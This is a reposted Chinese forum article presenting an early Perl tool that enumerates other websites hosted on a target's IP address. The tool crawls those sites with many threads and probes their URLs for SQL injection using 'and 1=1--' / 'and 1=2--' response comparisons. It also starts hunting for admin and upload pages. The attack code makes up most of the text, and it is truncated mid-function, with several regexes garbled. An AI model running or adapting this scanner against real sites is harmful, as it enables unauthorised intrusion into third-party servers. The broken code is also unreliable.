当前位置:编程学习 > 网站相关 >>

自动旁注检测工具代码

仅仅是测试目的,运行基本上已经通过,但是BUG还有很多,以后慢慢更新

由于鼓励自己继续前进的原因,此版本暂时命名为 0.1 :)

简单说明:

基于whois.webhosting.info平台获取旁注网站地址,读取和处理都是多线程工作

多线程部分采用了云舒的模型,该部分引用了许多他的代码,非常感谢他的劳动:)

主要功能是SQL注入简单测试,类似与and 1=1这样的,后台管理和上传路径的检测

:)ps: 转载请注明处处,欢迎喜欢它的人修改以及完善代码

注意: 切勿在未经授权下使用该程序攻击网站,可以作为检测网站安全性的一个小工具:)

#!/usr/bin/perl

# Code by naninb

# Mac osx 10.6.6 & perl 5.10.0

# Date 2011-03-7

#-==============================-

use strict;

use warnings;

 

use URI::URL;

use Web::Scraper;

use LWP::Simple;

use Net::hostent;

use Socket;

 

use Bloom::Filter;

use threads;

use threads::shared;

use Thread::Queue;

use Thread::Semaphore;

 

if (@ARGV < 1 || @ARGV >2)

{

warn "[-] Parameters error,Please input target url, and a thread numbers ";

exit;

}

 

my $my_target = gethost($ARGV[0])->addr;

my $host = URI::URL->new("host>http://".$ARGV[0])->host;

my $thread_number = $ARGV[1]||5;

my @same_ip_sites;

 

my $gms_filter = Bloom::Filter->new( capacity => 1024, error_rate => .0001 );

my $pu_filter = shared_clone(Bloom::Filter->new( capacity => 10000, error_rate => .0001 ));

 

my $sites_queue = Thread::Queue->new();

 

my $semaphore = Thread::Semaphore->new( $thread_number );

my $mutex = Thread::Semaphore->new( 1 );

 

# get others sites thread

threads->create(Get_More_Sites,$my_target);

 

while( 1 )

{

# join all threads which can be joined

#my $joined = 0;

foreach ( threads->list(threads::joinable) )

{

#$joined ++;

$_->join( );

}

#print $joined, " joined ";

 

# if there are no url need process.

my $item = $sites_queue->pending();

if( $item == 0 )

{

my $active = threads->list(threads::running);

# there are no active thread, we finish the job

if( $active == 0 )

{

print "All done! ";

last;

}

# we will get some more url if there are some active threads, just wait for them

else

{

#print "[MAIN] 0 URL, but $active active thread ";

sleep 1;

next;

}

}

 

# if there are some url need process

#print "[MAIN] $item URLn";

$semaphore->down;

#print "[MAIN]Create thread.n";

threads->create( &ProcessUrl );

}

 

 

foreach (threads->list())

{

$_->join();

}

 

 

 

sub Get_More_Sites

{

my ($site) = @_;

my $res;

my $page_number;

my $html_filter = scraper {

process "//a", "list[]" => { link => @href, text => "TEXT" };

};


my $whois_my_target = "http://whois.webhosting.info/".inet_ntoa($site);


my $first_try = get($whois_my_target);


if (!defined $first_try)

{

warn "[-] Get page numbers error! ";

exit;

}


# count pages numbers

if($first_try =~ /pi=(d*)8&ob=SLD&oo=ASC">Next/i)

{

$page_number = $1;

}elsif($first_try =~ /pi=(d*)&ob=SLD&oo=ASC">  Last/i)

{

$page_number = $1;

}


die "[-] Searching encounter random number authentication, try manual to post it! " unless defined $page_number;


my $i = 1;

while($i <= $page_number)

{

my $whois_my_target = $whois_my_target."?pi=".$i."&ob=SLD&oo=ASC";

eval

{

$res = $html_filter->scrape( URI->new($whois_my_target) );

};

if( $@ )

{

#warn "$@ ";

exit;

}

for my $a_text (@{$res->{list}})

{

#print "$a_text->{link}, $a_text->{text} ";

if( $a_text->{link} =~ /^http://whois.webhosting.info/$a_text->{text}/ )

{

if($a_text->{text} =~ /([wd]+.[w]{2,3})./)

{

# filter repeat elements

if (!$gms_filter->check($1))

{

#print "www.".$1." ";

$gms_filter->add($1);


push @same_ip_sites, "www.".$1;

$sites_queue->enqueue("http://www.".$1);


}

}

}

}


$i++;

}

 

if ($sites_queue->pending() < 1)

{

warn "[-] Your target have not much more sites for you, sorry! ";

exit;

}

}

 

sub ProcessUrl

{

my $scraper = scraper

{

process //a, links[] => @href;

};

 

my $res;

my $link;

 

while( my $url = $sites_queue->dequeue_nb() )

{

eval

{

$res = $scraper->scrape( URI->new($url) )->{links};

};

if( $@ )

{

#warn "$@ ";

next;

}

next if (! defined $res );

 

print "[+] Testing $url ";

 

foreach( @{$res} )

{

$link = $_->as_string;

$link = URI::URL->new($link, $url);

 

# not http and not https?

next if( $link->scheme ne http && $link->scheme ne https );

 

#next if( $link->host ne $host );

my $flag = 0;

foreach (@same_ip_sites)

{

($flag = 1,last) if ($_ eq $link->host);

}


next if( $flag == 1 );

 

$link = $link->abs->as_string;

 

$mutex->down();

# detect something

# sql injection, 2011-03-07

Detect_Sql_inj($link);

# manage page path

Detect_Manage_page($link);

# upload page path

Dectect_Upload_page($link);


if( ! $pu_filter->check($link) )

{

print $pu_filter->key_count(), " ", $link, " ";

$pu_filter->add($link);

$sites_queue->enqueue($link);

}

 

$mutex->up();

undef $link;

}

undef $res;

}

undef $scraper;

$semaphore->up( );

}

 

sub Detect_Sql_inj

{

my ($link) = @_;

if( $link =~ /(.*?)?(wd*)=/ )

{

my $and11 = get($link." and 1=1--");

my $and12 = get($link." and 1=2--");

print "[+] Found sql injection at the ",$link," " if( length($and11) != length($and12) );


my $and13 = get($link." and 1=1--");

my $and14 = get($link." and 1=2--");

print "[+] Found sql injection at the ",$link," " if( length($and13) != length($and14) );


}

}

 

sub Detect_Manage_page

{

my ($link) = @_;

my @mm_path = ("admin","adm","manage","administrator");


if ($link =~ /(.*?)#(.*)/)

{

use LWP::UserAgent;

 

my $ua = LWP::UserAgent->new();

$ua->timeout(5);

$ua->env_prox

补充:综合编程 , 安全编程 ,
CopyRight © 2022 站长资源库 编程知识问答 zzzyk.com All Rights Reserved
部分文章来自网络,